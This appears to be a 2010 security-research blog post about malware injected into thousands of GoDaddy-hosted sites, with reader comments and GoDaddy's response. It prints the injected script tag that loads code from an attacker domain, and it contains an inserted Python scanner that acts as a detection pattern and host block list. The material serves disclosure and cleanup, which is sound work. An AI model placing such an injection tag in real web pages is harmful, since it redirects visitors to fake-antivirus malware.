GoDaddy sites hacked with cloudisthebestnow

If you thought your problems at GoDaddy were over, well, not yet.

We’ve confirmed that today at around 3pm EST, GoDaddy servers were hacked again. Malware pointing to cloudisthebestnow.com/kp.php was inserted on thousands of sites hosted by the provider.

This is what the script will look like in your pages:

< script src = http://cloudisthebestnow.com/kp.php >

It will redirect your users to that nasty “fake AV” page again. What’s interesting is that cloudisthebestnow.com is hosted and owned by the same people involved in the latest attacks at GoDaddy.

$ host cloudisthebestnow.com
cloudisthebestnow.com has address 193.104.34.55
$ host losotrana.com
losotrana.com has address 193.104.34.55

A sample of the malware injected in the pages is available here: http://sucuri.net/malware/entry/MW:MROBH:2

If you are one of our customers, our scanner probably alerted you or will do so very soon.

How is this happening?

GoDaddy has some internal vulnerability that allows the attackers to upload the following code to the sites hosted there: MW:SIPRO:1. A few minutes after this code is uploaded, the attackers run it remotely, and this PHP script infects all the files within the site.
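A scanner for the injected tag shown earlier, as an added example (it is not Sucuri's cleanup script or any code from the original post): it walks a site directory and reports files containing a script tag whose src points at the two hosts named on this page. The function names, the file extensions checked and the use of losotrana.com as an indicator are assumptions made here, and it matches the tag only in the plain form shown above.

```python
import os
import re
import sys
from urllib.parse import urlparse

# Hosts named on this page (same IP in the lookups above); using both is an assumption.
BAD_HOSTS = {"cloudisthebestnow.com", "losotrana.com"}

# Matches '<script src="URL">' as well as the spaced, unquoted form
# '< script src = URL >' shown in the post; captures the URL.
SCRIPT_SRC = re.compile(
    r"<\s*script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)

# Constructed sample page, not taken from a real infected site.
SAMPLE = ('<html><script src="/js/menu.js"></script><body>hi</body>'
          '< script src = http://cloudisthebestnow.com/kp.php ></html>')

def bad_script_urls(text):
    """Return src URLs of script tags in text that load from BAD_HOSTS."""
    hits = []
    for url in SCRIPT_SRC.findall(text):
        try:  # urlparse lowercases the hostname and handles '//host/path'
            host = urlparse(url).hostname or ""
        except ValueError:  # malformed URL, e.g. unbalanced IPv6 brackets
            continue
        if host in BAD_HOSTS or any(host.endswith("." + h) for h in BAD_HOSTS):
            hits.append(url)
    return hits

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk root and map each matching file path to the URLs found in it."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    urls = bad_script_urls(fh.read())
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            if urls:
                findings[path] = urls
    return findings

if __name__ == "__main__":
    # With a path argument scan that tree, otherwise run the constructed sample.
    print(scan_tree(sys.argv[1]) if len(sys.argv) > 1 else bad_script_urls(SAMPLE))
```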

Clean up:

Our clean up script still works: Simple Cleanup Solution

Update from GoDaddy:

GoDaddy contacted us and left the following comment:

After the most recent malware attack the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.

The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.

If you believe your website is impacted, please fill out our Security Form, located here: https://www.godaddy.com/community/contactus.aspx?…

Our analysts will review and, if needed, remove the offending material from your website.

Neil Warner, Go Daddy Chief Information Officer

If you are having difficulties getting your site cleaned up, send us an email at support@sucuri.net, or visit our site: sucuri.net. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if they ever get infected with malware, hacked or blacklisted.

About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • http://twitter.com/Bourgy @Bourgy

    Just when I thought they'd solve it.
    I guess my site's turn will soon be coming

  • JohnR

    Yep, they got me again too at GoDaddy… Enormously frustrating. The attacks have continued now about once every 2.5 weeks for the past two months and everything I've done in recent months to try to protect and harden my sites was worthless, as the hackers seem to be getting in somehow via a backdoor out of my control and GD is unable to stop it. My actions here appear to be entirely irrelevant at this point, and their communication is among the worst ever I've seen from a company.

    They can't seem to stop it and I don't know if it's ignorance or ineptitude, but it doesn't matter anymore… A house is no good if the doors won't lock and soon I am going to be long gone from this broken house.

  • http://www.mirsolutions.net MirSolutions

    I did not see any of my sites infected as of 06/09/10, maybe because I have all my hosting on Windows Server using ASP or ASP.NET, no serious PHP.

    I hope it is contained completely soon.

  • Neil Warner

    Update: 6/9/2010

    After the most recent malware attack (more details here: http://community.godaddy.com/godaddy/malware-upda… the Go Daddy Security Operations Team conducted a thorough investigation and removed the malicious code impacting our customers.

    The attack injects websites with a fake-antivirus pop-up ad, claiming the visitor’s computer is infected.

    If you believe your website is impacted, please fill out our Security Form, located here: https://www.godaddy.com/community/contactus.aspx?…

    Our analysts will review and, if needed, remove the offending material from your website.

    Neil Warner, Go Daddy Chief Information Officer

    • JohnR

      How about stopping it from happening Neil?

  • http://twitter.com/elizawhat @elizawhat

    I’m not impressed with GoDaddy’s response to this. The information on their site about the attack is skimpy, whereas this site has more information about how to tell whether your site has been compromised. Once again, I’m very glad I use Host Gator. Unfortunately, many of my clients use GoDaddy. I’m hoping none of their sites have been compromised. I’ve never had a problem with security with Host Gator.

  • http://breadboxes.org Jay

    Ouch, yet another one… GoDaddy has had so many vulnerabilities lately.

  • cassadnra

    My ecommerce site's shopping cart with PHP was hacked through GoDaddy and they are blaming me for the second time. It is not on my end and I can fix it with my backup files. I emailed them a copy of the letter from Neil asking why they didn't send me that message instead of blaming my software and my computer. We'll see what happens.

  • Greg

    Just got hacked again on GoDaddy, 4th time on the same site. This was a fresh install; the problem is on their servers, not the sites.
    PHP might have a bit to answer for too; it can only attack via PHP, all static HTML is fine.
    I think there is a hint in the name of the domain "cloud is best now".
    Ruby on Rails, here I come (on Heroku, Engine Yard or many other rising stars that have the know-how to have a fighting chance at secure sites).